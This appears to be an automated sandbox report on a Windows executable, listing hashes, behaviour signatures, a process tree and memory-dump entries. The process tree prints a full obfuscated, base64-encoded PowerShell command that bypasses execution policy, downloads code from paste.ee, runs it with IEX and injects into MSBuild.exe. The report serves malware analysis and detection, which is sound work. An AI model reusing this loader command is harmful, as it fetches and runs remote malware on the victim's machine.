e10c07621cbf12d95bfcb870835c10bbda376fd9e17e49f5caca6b3a3d239bdb

General

Target

WYhCe.exe
Size

103KB
MD5

c2337bf726d285b3e59ef7f26f388bca
SHA1

5b2bfc673012d02f27299db6929a144fd2517f93
SHA256

e10c07621cbf12d95bfcb870835c10bbda376fd9e17e49f5caca6b3a3d239bdb
SHA512

27e9e92d12658dd6a6e1e710577ea94d8523d3a6f703646007d8d001db9a2b608d314d9e727063207699db9717ed0e2bb77c2a19bae3e79542bec9389c5d2ba1

Score

3^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe
4068	WerFault.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WYhCe.execmd.exe

description	pid	process	target process
PID 1492 wrote to memory of 1776	1492	WYhCe.exe	cmd.exe
PID 1492 wrote to memory of 1776	1492	WYhCe.exe	cmd.exe
PID 1492 wrote to memory of 1776	1492	WYhCe.exe	cmd.exe
PID 1776 wrote to memory of 1796	1776	cmd.exe	powershell.exe
PID 1776 wrote to memory of 1796	1776	cmd.exe	powershell.exe
PID 1776 wrote to memory of 1796	1776	cmd.exe	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4068 1796 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 4068 WerFault.exe
Token: SeBackupPrivilege 4068 WerFault.exe
Token: SeDebugPrivilege 4068 WerFault.exe

pid	pid_target	process	target process
4068	1796	WerFault.exe	powershell.exe

description	pid	process
Token: SeRestorePrivilege	4068	WerFault.exe
Token: SeBackupPrivilege	4068	WerFault.exe
Token: SeDebugPrivilege	4068	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\WYhCe.exe
"C:\Users\Admin\AppData\Local\Temp\WYhCe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start PowERsHELl.ExE -ExecutionPolicy bypass -w 1 /e JABIAFAAdgBhAGQASQAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHUAQgBKADEAZgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAEsAcQBNAFkAUQBDAGUAZABMAGgAcwBDAFkARwBpAHMAVgBvAGEATQBYAFAAdwBLAFUAYwBTAHcAdAB6AHgAUQBEAGMAbQBVAG4AaQBYAEEASQB5AG8AdABMAGEAWQBkAGkATgBuAFoAUABUAFUAZQBOAGcATgB0AHQAdwBqAHMAWgBTAHQAbABnAFEAQQBGAGcAbQBhAEcAUQBWAHEAZwBEAFcAWgB5AFgAUQBEAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASABpAFMANgBpACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PowERsHELl.ExE -ExecutionPolicy bypass -w 1 /e JABIAFAAdgBhAGQASQAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHUAQgBKADEAZgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAEsAcQBNAFkAUQBDAGUAZABMAGgAcwBDAFkARwBpAHMAVgBvAGEATQBYAFAAdwBLAFUAYwBTAHcAdAB6AHgAUQBEAGMAbQBVAG4AaQBYAEEASQB5AG8AdABMAGEAWQBkAGkATgBuAFoAUABUAFUAZQBOAGcATgB0AHQAdwBqAHMAWgBTAHQAbABnAFEAQQBGAGcAbQBhAEcAUQBWAHEAZwBEAFcAWgB5AFgAUQBEAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAEgAUAB2AGEAZABJACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ASABpAFMANgBpACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABLAHEATQBZAFEAQwBlAGQATABoAHMAQwBZAEcAaQBzAFYAbwBhAE0AWABQAHcASwBVAGMAUwB3AHQAegB4AFEARABjAG0AVQBuAGkAWABBAEkAeQBvAHQATABhAFkAZABpAE4AbgBaAFAAVABVAGUATgBnAE4AdAB0AHcAagBzAFoAUwB0AGwAZwBRAEEARgBnAG0AYQBHAFEAVgBxAGcARABXAFoAeQBYAFEARABqACkA
3⤵
PID:1796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 716
4⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4068

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1776-0-0x0000000000000000-mapping.dmp

Download
memory/1796-1-0x0000000000000000-mapping.dmp

Download
memory/1796-2-0x0000000000000000-mapping.dmp

Download
memory/1796-4-0x0000000000000000-mapping.dmp

Download
memory/1796-5-0x0000000000000000-mapping.dmp

Download
memory/1796-6-0x0000000000000000-mapping.dmp

Download
memory/1796-7-0x0000000000000000-mapping.dmp

Download
memory/1796-8-0x0000000000000000-mapping.dmp

Download
memory/1796-9-0x0000000000000000-mapping.dmp

Download
memory/4068-3-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/4068-11-0x0000000005140000-0x0000000005141000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads